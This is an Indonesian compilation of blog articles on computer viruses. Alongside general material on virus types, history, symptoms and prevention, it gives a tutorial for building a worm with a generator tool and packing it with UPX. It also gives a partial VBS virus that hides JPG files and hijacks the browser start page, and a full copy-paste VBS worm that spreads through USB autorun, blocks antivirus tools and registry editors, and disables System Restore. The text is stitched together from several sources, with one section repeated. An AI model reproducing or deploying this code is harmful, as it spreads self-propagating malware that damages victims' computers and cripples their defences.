Cara Kerja Virus Komputer Menurut Jenisnya
Virus merupakan suatu program komputer yang memiliki kemampuan untuk merusak file atau merusak sistem komputer.
Virus memiliki berbagai jenis dan mempunyai cara kerja yang berbeda-beda,
Berikut Jenis-jenis virus dan cara kerja masing-masing virus :
1. Virus File
Virus ini mempunyai cara kerja yaitu menginfeksi aplikasi atau dokumen yang ada dalam komputer anda.
Saat aplikasi yang terinfeksi tersebut dijalankan, maka virus ini akan menyebar dengan cara menginfeksi semua file atau dokumen yang diakses oleh aplikasi tersebut.
2. Virus Boot Sector
Virus ini mempunyai cara kerja yaitu menginfeksi boot sector harddisk (boot sector merupakan sebuah daerah dalam hardisk yang pertama kali diakses saat komputer dihidupkan).
Jika virus boot sector ini aktif, pengguna tidak akan bisa membooting komputernya secara normal.
3. Virus E-mail
Virus ini mempunyai cara kerja yaitu menyebar melalui e-mail (biasanya dalam bentuk file lampiran/attachment).
Virus memiliki ciri khusus berupa ekstensi .scr, .exe, .pif, atau .bat.
Apabila Virus ini aktif, maka dia akan mengirimkan dirinya sendiri ke berbagai alamat e-mail yang terdapat dalam buku alamat pengguna.
4. Virus Multipartite
Virus ini mempunyai cara kerja yaitu menginfeksi file-file komputer sekaligus boot sector pada harddisk.
Virus jenis ini akan menimbulkan banyak masalah karena menyebabkan kerusakan yang fatal.
5. Virus Polimorfis
Virus ini mempunyai cara kerja yang unik yaitu virus ini dapat mengubah kode dirinya (berganti wujud) saat menyebarkan diri ke komputer lain
Virus jenis lebih sulit dideteksi karena mempunyai sifat seperti itu..
6. Virus Siluman (stealth virus)
Virus ini mempunyai cara kerja yaitu dia mampu Menyembunyikan dirinya dengan cara membuat sebuah file yang terinfeksi seolah-olah file tersebut tidak terinfeksi.
7. Virus Makro
Virus ini mempunyai cara kerja yaitu menginfeksi Aplikasi Microsoft Office, seperti Word dan Excel.
Biasanya Dokumen yang terinfeksi oleh Virus Makro akan memodifikasi perintah yang ada di Microsoft Office seperti perintah “Save” untuk menyebarkan dirinya saat perintah tersebut dijalankan.
Virus komputer seringkali membuat kita marah, frustasi bahkan seringkali kita sangat benci kepada virus tersebut. Namun sejarah terciptanya virus tetap menarik untuk kita simak.
kata orang tak kenal maka tak sayang..siapa tahu setelah kita mengenal virus melalui ”SERI MENGENAL VIRUS ala PUSATGRATIS”, kita bisa berubah dari benci menjadi sayang, hehehe..
kembali ke topik utama..bagaimanakah sejarah virus dan bagaimana asal muasal virus hingga bisa sampai menyebar dan banyak seperti sekarang ini ?
pada mulanya..virus tercipta bersamaan dengan terciptanya komputer. Tepatnya pada tahun 1949, pencipta Electronic Discrete Variable Automatic Computer (EDVAC) yang juga merupakan salah seorang pencipta komputer, John Von Newman memaparkan suatu makalah hasil penemuannya. Makalah tersebut berjudul “Theory and Organization of Complicated Automata” , makalah tersebut berisi teori “self altering automata” yang merupakan hasil riset dari para ahli matematika. Dalam makalah tersebut dibahas kemungkinan program dapat menyebar dengan sendirinya.
Selanjutnya perkembangan virus komputer dilakukan pada tahun 1960 di AT&T Bell Laboratory, salah satu lab terbesar di dunia yang telah menghasilkan banyak hal seperti bahasa C++ dsb.
Di laboratorium ini peneliti membuat suatu permainan dengan suatu program berdasarkan penemuan jhon newman tersebut. Pada waktu istirahat, para peneliti tersebut membuat permainan (game) dengan suatu program yang mampu memperbanyak dirinya, menghancurkan program lawan dan mampu memperbaiki dirinya sendiri secara otomatis.
Permainan perang program ini disebut Core War. Pemenang permainan ini di pegang oleh pemilik program yang mempunyai sisa terbanyak dalam waktu tertentu. Permainan ini akhirnya menjadi permainan favorit di tiap - tiap lab untuk mengisi waktu istirahat para peneliti
Tetapi semakin lama program yang diciptakan semakin berbahaya. Akhirnya karena sadar akan bahaya yang ditimbulkan program tersebut, apalagi jika program tersebut sampai bocor keluar laboratorium, maka setiap selesai permainan, program tersebut selalu dihapus dan dimusnahkan.
Selain itu juga dilakukan pengawasan dan pengamanan yang semakin ketat terhadap permainan Core War ini.
pada tahun 1970an, sebuah program yang diklaim dapat membantu kelancaran kerja dikenalkan oleh perusahaan xerox. Struktur program tersebut menyerupai virus. Namun sebenarnya program tersebut digunakan untuk memaksimalkan waktu dengan dapat melaksanakan dua proses secara bersamaan.
Baru pada tahun 1980an, program perang berhasil menyebar keluar dari laboratorium dan menjadi terbuka di kalangan umum. Dimulai oleh pemaparan seorang peneliti sekaligus asisten profesor di ohio Universitas Cincinati, fred cohen. Dia mendemonstrasikan sebuah program hasil penemuannya, yaitu program yang mampu menyebar secara cepat ke dalam komputer secara otomatis. Karena cara kerja dan penyebarannya yang menyerupai sebuah virus, maka program tersebut akhirnya Fred Cohen menyebutnya sebagai virus.
sedangkan di indonesia sendiri, banyak penguna komputer pernah digemparkan dengan munculnya wabah virus pertama. Virus tersebut bernama virus ©Brain, atau yang lebih dikenal dengan nama virus Pakistan. Hal menggemparkan tersebut terjadi pada tahun 1988 di indonesia.
Oke, tanpa banyak cang…cing…cong….nyak..babeh…, mari kita mulai dengan ‘Black Project’ yang akan kita ciptakan, siap….????? Oke kita mulai…..
Oooopppss…. Tapi sebelumnya ada yang tau VB+Vimaker32 ga??? Oke, mungkin biar ga bingung and ga tersesat nantinya , saya akan jelaskan sedikit. VB+ViMaker32 adalah sebuah worm generator yang diciptakan khusus untuk menciptakan worm secara mudah,cepat dan instan atau istilah gaulnya GPLLY (ga pake lama la yaw…. J )
Sesuai dengan namanya program ini dapat menciptakan worm dalam bahasa Visual Basic yang akan mempunyai aksi-aksi tertentu sesuai dengan pengaturan yang diberikan. (Bener-bener sesuai dengan pengaturan yang kita kasih lho….), so buat para newbie yang pengen jadi #VM (Virus Maker bo…!) bisa pake ni program buat belajar. Tapi Cuma buat belajar lho, bukan buat mainan atawa yang laen apalagi buat ngerusak komputer orang laen, sesuai dengan tujuan dibuatnya tool ini, Cuma buat pendidikan dan ilmu pengetahuan, (Itu kata pembuatnya….).Oh ya Program ini bisa didownload gratis di: http://www.spyrozone.net di menu Vir&Worm + Removal. Atau e-mail aj ke sang empunya di: rzwan182@gmail.com.
Oke dech langsung aj kali ye… bis cape ngomong terus dari tadi ga mulai-mulai neh…J Tapi sebelum kita memulai membuat ‘Black Project’ dengan tool ini kita membutuhkan beberapa persyaratan dan tools, yang semuanya bisa didownload di dapur kalian masing-masing:
Sebuah gelas yang berisi air panas lengkap dengan sendoknya.
Satu sachet cappuccino rasa apa saja yang belum kadaluwarsa, klo ini bisa didownload di warung terdekat… J)
Cemilan, kalo bisa yang enak dan ga mengandung lemak.
Hati, Pikiran dan niat yang tulus dan ikhlas untuk menanggung segala macam akibat dan resiko yang terjadi apabila kesalahan atau ketidaksengajaan yang menyebabkan worm yang dibuat menjadi raja dikomputer sendiri (sejenis senjata makan tuan gtu…. J)
Sekarang benar-benar mulai deh, setelah didownload, pertama install dulu program VB+Vimaker32-nya tapi sebelumnya backup dulu data2 penting untuk mencegah sesuatu yang tidak diinginkan, truz jalanin file .exe nya, lalu pilih File->Project Baru (Full Load) atau tekan Ctrl+M di keyboard. Hasilnya seperti gambar dibawah ini.
Tampilan VB+Vimaker32 RC 03 :
Masukan semua keterangan tentang virus yang akan dibuat beserta pengaturan-pengaturan lainnya, seperti pengaturan Informasi Virus, Registry, Message dan dll. Masukan semuanya sesuai dengan keinginan, untuk lebih lengkapnya buka aja dokumentasinya yang disertakan. Semua informasi pengaturan settings dll ada disitu. Yang menarik dari program ini adalah karna banyak pengaturan dan kustomasi yang bisa diatur sendiri sesuai dengan kebutuhan, tidak seperti program worm generator lainnya yang cuma tinggal masukin nama pembuat dan pesan yang akan ditampilkan, terasa kurang bebas dan leluasa gtu… J,
Untuk pengaturan tentang registry yang akan diubah bisa diambil di menu Tools-> Registry Action Selector, terdapat 50 Registry Entry yang bisa dipilih, tinggal pilih truz double klik di setingan registry-nya. Truz klik Insert, Cut dan paste di section [REGISTRY]. Selain itu worm yang dibuat dengan tools ini juga bisa membaca caption window yang aktif sehingga jika caption tersebut ada dalam daftar terlarang maka akan otomatis dilumpuhkan. Untuk memilih daftar window caption yang akan dilumpuhkan gunakan Window Caption Selector di menu Tools. Disitu ada 176 daftar caption yang bisa dipilih. Tuh kan ga beda jauh dengan worm lokal sejenisnya. Pokokenya top bgt nih program! He..he… J
Berikut tampilan Registry Action Selector :
Window Caption Selector
Jangan lupa icon virusnya juga bisa diubah, untuk mengganti icon default tinggal ubah di subsection : EXEIcon = \Icons Source\Folder\Folder001.ico
Terdapat banyak pilihan icon yang disediakan didalam folder Icons Source, so tinggal pilih aja…
Terakhir dan merupakan saat yang ditunggu-tunggu adalah melakukan pemeriksaan kode yang telah diketik sebelum dicompile menjadi virus. Klik menu Project->Analisa Project atau tekan F8 untuk menganalisa kode, setelah analisa selesai dan tidak ada kesalahan penulisan kode yang dideteksi maka ‘Black Project’ yang kita buat bisa langsung dicompile. Tekan F9 untuk mengcompile project dan sebuah pesan peringatan akan muncul dan menanyakan apakah proses compile akan dilajutkan, baca dulu semua konsekuensinya truz klo setuju klik yes, maka virus yang kita buat akan langsung dicompile menjadi file executable (.exe)
File virus hasil compile :
File hasil compile memang cukup besar karena tidak otomatis dikompres secara internal, tapi kita masih bisa mengompres dengan program kompresor lain seperti UPX atau tElock. Akhir kata selamat ber-Virus Maker J Semoga artikel ini bermanfaat dan sungguh tak ada niat dari penulis sedikitpun untuk memotivasi agar membuat virus dengan tool ini, tujuan penulis tidak lain hanya berbagi informasi dan pengetahuan dan penulis tidak bertanggung jawab atas segala resiko apapun yang terjadi akibat dari penyalahgunaan artikel ini. Dan penulis ucapkan terima kasih kepada jasakom yang telah bersedia mempublish artikel ini.
Virus yang akan di buat kali ini dengan menggunakan VBS. Terlebih dulu kiTa akan rencakan skenario kerja dari virus tersebut. Skenario
virus tersebut adalah sebagai berikut:
1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat
didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan
merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut
terhapus.
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat
restart
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk.
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet
Explorer
Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan
pelajari dari script dibawah ini:
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya
sesuai dengan skenario diatas, dan di bawah ini programnya.
Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,".")) & "jpeg")
set fbackup = fso.GetFile(Left(target,instrrev(target,".")) & "jpeg")
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,".")) & "jpg " & ".vbs")
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)="jpg") then serangan_jpg(filetarget)
Next
End Sub
2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash
disk dan kemudian menularinya.
Sub serangan_drive()
Set fso = CreateObject("Scripting.FileSystemObject")
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & "" & "wolio.vbs")
If drive.DriveType = 1 And drive.DriveLetter > "C:" Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & "" & "autorun.inf",False)
fileautorun.WriteLine("[AUTORUN]")
fileautorun.WriteLine("RUN=wolio.vbs")
End If
End Sub
3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML
yang diinginkan
Sub serangan_ie()
If (regedit.RegRead("HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page")<>"c:\windows\system32\wolio.html") Then
regedit.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page","c:\windows\system32\wolio.html"
End If
End Sub.
Apa itu virus?
Virus atau worm adalah suatu program komputer yang dapat menyebar pada komputer atau jaringan dengan cara membuat copy dari dirinya sendiri tanpa sepengetahuan dari pengguna komputer tersebut. Virus dapat menimbulkan efek yang berbahaya, misalnya mulai dari menampilkan pesan, mencuri data atau bahkan mengontrol komputer Anda dari jarak jauh.
Bagaimana virus menginfeksi komputer?
Suatu virus pertama kali harus dijalankan sebelum ia mampu untuk menginfeksi suatu komputer. berbagai macam cara agar virus ini dijalankan oleh korban, misalnya dengan menempelkan dirinya pada suatu program yang lain. juga virus yang jalan ketika Anda membuka suatu tipe file tertentu. Kadangkala virus juga memanfaatkan celah keamanan yang ada pada komputer Anda (baik sistem operasi atau aplikasi), dengan memanfaatkan hal-hal tersebut virus dapat berjalan dan kemudian akan menyebarkan dirinya sendiri secara otomatis.
Anda juga dapat menerima suatu file yang sudah terinfeksi virus dalam attachment e-mail Anda. Begitu file tersebut Anda jalankan, maka kode virus akan berjalan dan mulai menginfeksi komputer Anda dan bisa menyebar pula ke semua file yang ada di jaringan komputer Anda.
Trojan horse
Trojan horse adalah program yang kelihatan seperti program yang valid atau normal, tetapi sebenarnya program tersebut membawa suatu kode dengan fungsi-fungsi yang sangat berbahaya bagi komputer Anda.
Sebagai contoh, virus DLoader-L datang dari attachment e-mail dan dianggap sebagai sebagai suatu update program dari Microsoft untuk sistem operasi Windows XP. Jika Anda menjalankannya maka dia akan mendownload program dan akan memanfaatkan komputer Anda untuk menghubungkan komputer Anda ke suatu website tertentu. Targetnya tentu saja untuk membuat website tadi menjadi overload dan akhirnya tidak bisa diakses dengan benar oleh pihak lain. Ini sering dinamakan dengan serangan denial of service atau DoS.
Trojan tidak dapat menyebar secepat virus karena trojan tidak membuat copy dari dirinya sendiri secara otomatis. Tapi sejalan dengan perkembangan virus, maka trojan horse bisa bekerjasama dengan virus dalam hal penyebarannya. Virus dapat melakukan download terhadap trojan yang merekam keystroke keyboard Anda atau mencuri informasi yang ada pada komputer Anda. Di sisi lain, trojan juga digunakan untuk menginfeksi suatu komputer dengan virus.
Worms
Worm bisa dikatakan mirip dengan virus tetapi worm tidak memerlukan carrier dalam hal ini program atau suatu dokumen. Worm mampu membuat copy dari dirinya sendiri dan mengunakan jaringan komunikasi antar komputer untuk menyebarkan dirinya. Banyak virus seperti MyDoom atau Bagle bekerja sebagaimana layaknya worm dan menggunakan e-mail untuk mem-forward dirinya sendiri kepada pihak lain.
Apa yang bisa dilakukan oleh virus?
Virus seringkali mengganggu Anda atau menghentikan kerja komputer Anda pada saat diperlukan. Sejalan dengan perkembangan di dunia virus komputer maka sampai saat ini efek dari virus ini sudah semakin banyak, yaitu:
Memperlambat e-mail
Virus dapat menyebar melalui e-mail, seperti virus Sobig, dan mampu untuk membuat trafik e-mail yang sangat besar yang tentu saja akan membuat server menjadi lambat atau bahkan menjadi crash. Bahkan jika hal tersebut tidak sampai terjadi, perusahaan yang merasa terganggu dengan insiden ini toh juga akan mematikan servernya.Mencuri data konfidental
Worm Bugbear-D contohnya, mampu merekam keystroke keyboard Anda, termasuk password dan lain sebagainya. Rekaman tadi biasanya akan dikirim ke si pembuat virus untuk dimanfaatkan lebih lanjut.Menggunakan komputer Anda untuk menyerang suatu situs
MyDoom contohnya, dia menginfeksi banyak komputer di seluruh dunia untuk menyerang situs SCO dengan traffic data yang sangat besar. Ini akan membuat situs tersebut akan terbebani luar biasa dan akhirnya akan crash dan tidak bisa melayani pengguna lainnya. Ini biasa dinamakan dengan denial of service.Membiarkan orang lain untuk membajak komputer Anda
Beberapa virus menempatkan trojan backdoor pada komputer dan ini akan membuat si pembuat virus dapat terhubung ke komputer tersebut secara diam-diam dan bisa dimanfaatkan lebih lanjut sesuai dengan keinginannya.Merusak data
Virus Compatable contohnya, dapat membuat perubahan pada data yang Anda simpan pada dokumen MS Excel.Menghapus data
Virus Sircam contohnya, berusaha untuk menghapus atau meng-overwrite hardisk Anda pada suatu waktu tertentu yang tidak terduga.Men-disable hardware
Virus CIH atau contohnya, berusaha untuk meng-overwrite chip BIOS pada tanggal 26 April dan akan membuat komputer Anda menjadi tidak berfungsi.Menimbulkan hal-hal yang aneh dan mengganggu
Virus worm Netsky-D contohnya, dapat membuat komputer berbunyi beep secara spontan atau tiba-tiba untuk beberapa jam lamanya.Menampilkan pesan tertentu
Virus Cone-F contohnya, akan menampilkan pesan berbau politik jika bulan menunjukkan bulan Mei.Merusak kredibilitas Anda
Jika virus mem-forward dirinya sendiri dari komputer Anda ke komputer pelanggan Anda atau komputer rekan bisnis Anda, maka hal ini akan merusak reputasi Anda sebagai suatu organisasi dan mereka akan tidak mau lagi melanjutkan hubungan bisnis dengan Anda atau malah menuntut kompensasi dari pihak Anda.Membuat malu Anda
Virus PolyPost contohnya, akan memposting dokumen dan nama Anda pada newsgroup yang berbau pornografi.
Virus adalah program yang dibuat oleh seorang programmer dan bersifat merusak. Virus menginfeksi file dengan ekstensi file tertentu, .exe, .com, .txt, .jpg, dan lain sebagainya. Jenis – jenis virus bisa dibedakan menjadi beberapa bagian, yaitu :
a) Virus boot sector
Merupakan virus umum, menggandakan diri dengan cara menindih bootsector asli pada sebuah disk, sehingga pada saat booting virus akan langsung dijalankan ke memori.
b) Virus file
Menyerang file yang dijalankan oleh suatu sistem operasi. Biasanya menyerang com atau exe.
c) Virus direct action
Virus ini akan masuk ke memori untuk menjalankan file lainnya. Lalu menjalankan program lain untuk menipu.
d) Multi Partition virus
Merupakan gabungan dari virus boot sector dan virus file.
e) Polymorphic virus
Virus dirancang untuk mengelabui program AV yaitu dengan mengubah struktur dirinya setelah menjalankan perintah.
f) Stealth virus
Mengendalikan instruksi – instruksi level DOS dengan menguasai tabel interrupt.
g) Macro virus
Ditulis oleh bahasa pemrograman dari suatu aplikasi, sehingga bersifat platform independent.
Perbedaan virus dengan program komputer lainnya
Perbedaan virus dengan program aplikasi komputer lainnya adalah :
1. Kemampuan mendapatkan informasi penting
Virus didesain untuk menginfeksi banyak file atau program. Misalnya, virus akan menulari seluruh file .txt atau .htt, maka virus tersebut akan mencari informasi tentang file-file atau program-program yang ada. Setelah virus mendapatkan informasi tersebut, maka akan disimpan di memory atau di suatu file tertentu yang telah di-set attributnya menjadi hidden (tersembunyi).
2. Kemampuan untuk memeriksa program atau file
Ketika meninfeksi sebuah file, virus harus bisa memeriksa apakah file tersebut telah terinfeksi atau belum. Biasanya virus akan memeriksa byte yang dipakai oleh virus tersebut, atau dengan nama lain penanda. Apabila penanda tersebut telah ada maka virus tidak akan menginfeksi file tersebut. Tetapi apabila file tersebut tidak ada penandanya, maka virus akan menulari file yang sehat itu.
3. Kemampuan menggandakan diri
Kemampuan ini harus (wajib) dimiliki oleh virus, karena kemampuan ini digunakan untuk perkembang-biakan virus tersebut. Biasanya virus akan memasang penanda dan menyisipkan program untuk memperbanyak virus tersebut.
4. Kemampuan untuk memanipulasi
Kemampuan ini digunakan untuk memunculkan pesan, gambar, menghapus file, mencuri data/file, dan lain sebagainya.
5. Kemampuan untuk menyembunyikan diri dan data yang dibuat
Seluruh aktifitas yang dilakukan virus haruslah tidak kelihatan, baik dari user ataupun dari komputer. Hal ini menjadi keindahan sebuah virus. Biasanya kita bisa melihat seluruh proses yang ada di komputer (khususnya yang berbasis Windows) hanya dengan menekan Ctrl+Alt+Delete, maka akan muncul kotak yang berisikan proses-proses yang berjalan pada komputer. Sebuah virus yang bagus adalah yang tidak tertangkap prosesnya oleh trapping tersebut. Apalagi jika dapat menghindari deteksi sebuah antivirus.
1. Arti Definisi / Pengertian Virus Komputer
Virus komputer adalah suatu program komputer yang menduplikasi atau menggandakan diri dengan menyisipkan kopian atau salinan dirinya ke dalam media penyimpanan / dokumen serta ke dalam jaringan secara diam-diam tanpa sepengetahuan pengguna komputer tersebut. Efek dari virus komputer sangat beragam mulai dari hanya muncul pesan-pesan aneh hingga merusak komputer serta menghapus file atau dokumen kita.
2. Arti Definisi / Pengertian Varian Virus Worm, Trojan Dan Spyware
a. Worm
Worm adalah lubang keamanan atau celah kelemahan pada komputer kita yang memungkinkan komputer kita terinfeksi virus tanpa harus eksekusi suatu file yang umumnya terjadi pada jaringan.
b. Trojan
Trojan adalah sebuah program yang memungkinkan komputer kita dikontrol orang lain melalui jaringan atau internet.
c. Spyware
Spyware adalah aplikasi yang membocorkan data informasi kebiasaan atau perilaku pengguna dalam menggunakan komputer ke pihak luar tanpa kita sadari. Biasanya digunakan oleh pihak pemasang iklan.
Jika kita melihat kejanggalan pada media penyimpanan seperti file bernama aneh yang tidak pernah kita buat atau file bukan jenis aplikasi / application tetapi mengaku sebagai aplikasi maka jangan kita klik, kita buka atau kita jalankan agar virus komputer tersebut tidak menular ke komputer yang kita gunakan.
Tanda-Tanda/Ciri-Ciri Komputer Kita Terkena/Terinfeksi Virus Komputer :
- Komputer berjalan lambat dari normal
- Sering keluar pesan eror atau aneh-aneh
- Perubahan tampilan pada komputer
- Media penyimpanan seperti disket, flashdisk, dan sebagainya langsung mengkopi file aneh tanpa kita kopi ketika kita hubungkan ke komputer.
- Komputer suka restart sendiri atau crash ketika sedang berjalan.
- Suka muncul pesan atau tulisan aneh
- Komputer hang atau berhenti merespon kita.
- Harddisk tidak bisa diakses
- Printer dan perangkat lain tidak dapat dipakai walaupun tidak ada masalah hardware dan software driver.
- Sering ada menu atau kotak dialog yang error atau rusak.
- Hilangnya beberapa fungsi dasar komputer.
- Komputer berusaha menghubungkan diri dengan internet atau jaringan tanpa kita suruh.
- File yang kita simpan di komputer atau media penyimpanan hilang begitu saja atau disembunyikan virus. dan lain-lain...
Contoh bentuk media penyebaran virus komputer dari komputer yang satu ke komputer yang lain :
- Media Penyimpanan (disket, flashdisk, harddisk eksternal, zipdisk, cd, dvd, bluray disc, cartridge, dan lain sebagainya)
- Jaringan lan, wan, man, internet dan lain sebagainya.
- File attachment atau file lampiran pada email atau pesan elektronik lainnya.
- File software (piranti lunak) yang ditunggangi virus komputer.
Cara yang paling ampuh agar kita tidak terkena virus komputer adalah dengan cara menginstall program komputer yang orisinil atau asli bukan bajakan yang tidak ditunggangi virus dan kawan-kawan, tidak menghubungkan komputer dengan jaringan atau internet, serta tidak pernah membuka atau mengeksekusi file yang berasal dari komputer lain.
Tetapi cara seperti itu terlalu ekstrim dan kurang gaul dalam penggunaan komputer sehari-hari karena biasanya kita melakukan pertukaran data atau file dengan komputer lain baik berupa file pekerjaan, file gambar, file attachment, file musik, file video, dan lain sebagainya.
Jadi untuk menghindari komputer kita diinfeksi dan terserang virus maka kita harus waspada dalam berinteraksi dengan file dari komputer lain, file dari media penyimpanan dari orang lain, attachment email, pertukaran file jaringan, lubang keamanan komputer kita, dan lain-lain. Pasang antivirus yang bagus yang di update secara berkala serta program firewall untuk jaringan dan anti spyware dan adware untuk menanggulangi jenis gangguan komputer lain.
Cara Kerja Virus Komputer Menurut Jenisnya
Virus merupakan suatu program komputer yang memiliki kemampuan untuk merusak file atau merusak sistem komputer.
Virus memiliki berbagai jenis dan mempunyai cara kerja yang berbeda-beda,
Berikut Jenis-jenis virus dan cara kerja masing-masing virus :
1. Virus File
Virus ini mempunyai cara kerja yaitu menginfeksi aplikasi atau dokumen yang ada dalam komputer anda.
Saat aplikasi yang terinfeksi tersebut dijalankan, maka virus ini akan menyebar dengan cara menginfeksi semua file atau dokumen yang diakses oleh aplikasi tersebut.
2. Virus Boot Sector
Virus ini mempunyai cara kerja yaitu menginfeksi boot sector harddisk (boot sector merupakan sebuah daerah dalam hardisk yang pertama kali diakses saat komputer dihidupkan).
Jika virus boot sector ini aktif, pengguna tidak akan bisa membooting komputernya secara normal.
3. Virus E-mail
Virus ini mempunyai cara kerja yaitu menyebar melalui e-mail (biasanya dalam bentuk file lampiran/attachment).
Virus memiliki ciri khusus berupa ekstensi .scr, .exe, .pif, atau .bat.
Apabila Virus ini aktif, maka dia akan mengirimkan dirinya sendiri ke berbagai alamat e-mail yang terdapat dalam buku alamat pengguna.
4. Virus Multipartite
Virus ini mempunyai cara kerja yaitu menginfeksi file-file komputer sekaligus boot sector pada harddisk.
Virus jenis ini akan menimbulkan banyak masalah karena menyebabkan kerusakan yang fatal.
5. Virus Polimorfis
Virus ini mempunyai cara kerja yang unik yaitu virus ini dapat mengubah kode dirinya (berganti wujud) saat menyebarkan diri ke komputer lain
Virus jenis lebih sulit dideteksi karena mempunyai sifat seperti itu..
6. Virus Siluman (stealth virus)
Virus ini mempunyai cara kerja yaitu dia mampu Menyembunyikan dirinya dengan cara membuat sebuah file yang terinfeksi seolah-olah file tersebut tidak terinfeksi.
7. Virus Makro
Virus ini mempunyai cara kerja yaitu menginfeksi Aplikasi Microsoft Office, seperti Word dan Excel.
Biasanya Dokumen yang terinfeksi oleh Virus Makro akan memodifikasi perintah yang ada di Microsoft Office seperti perintah “Save” untuk menyebarkan dirinya saat perintah tersebut dijalankan.
Ya..
Kali ini saya akan membagi script virus, script ini boleh anda sebarluaskan, bahkan anda jalankan. Tapi dengan tujuan untuk pembelajaran semata.
Kedewasan sikap anda sangat dibutuhkan, segala resiko yang dihasilkan oleh virus ini, diluar tanggung jawab saya.
Sekali lagi, gunakan script ini hanya untuk tujuan pembelajaran. Bukan untuk merusak, bila anda ingin melihat kemampuannya, silahkan aktifkan di komputer anda sendiri. Jangan di komputer orang lain. Saya tidak bertanggung jawab atas kerusakan yang di buat oleh virus ini.
Pertama-tama buka notepad, kemudian copas (copy-paste) script di bawah ini kedalam notepad, kemudian simpan dengan format vhck3d.vbs dimulai dari on error resume next
-------------------------script begin--------------------------
On error resume next
Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd
'Siapkan isi autorun atau bahasa kerennya make the autorun
Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dini = dini & text.readline
Dini = dini & vbcrlf
Loop
Do
'Buat file induk bahasa coolnya prepare the mother
Set i = you.getspecialfolder(0)
Set jatiya = you.getspecialfolder(1)
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 32
Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 39
'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya
For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")
Tf.attributes =32
Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf=you.getfile(loph.path &"\vhck3d.vbs")
Tf.attributes = 39
Set tf =you.getfile(loph.path &"\autorun.inf")
Tf.attributes = 32
Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)
Tf.write isi
Tf.close
Set tf = you.getfile(loph.path &"\autorun.inf")
Tf.attributes=39
End if
Next
'Manipulasi registry
Set vhck3d = createobject("wscript.shell")
'Banyak yang dirubah..liat ndiri deh aaah
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"
If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname
-----------------------end script-----------------------------
Yaaa....itu adalah scriptnya, tapi kalau kalian mau modifikasi juga boleh..bahkan cukup sampai di
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname
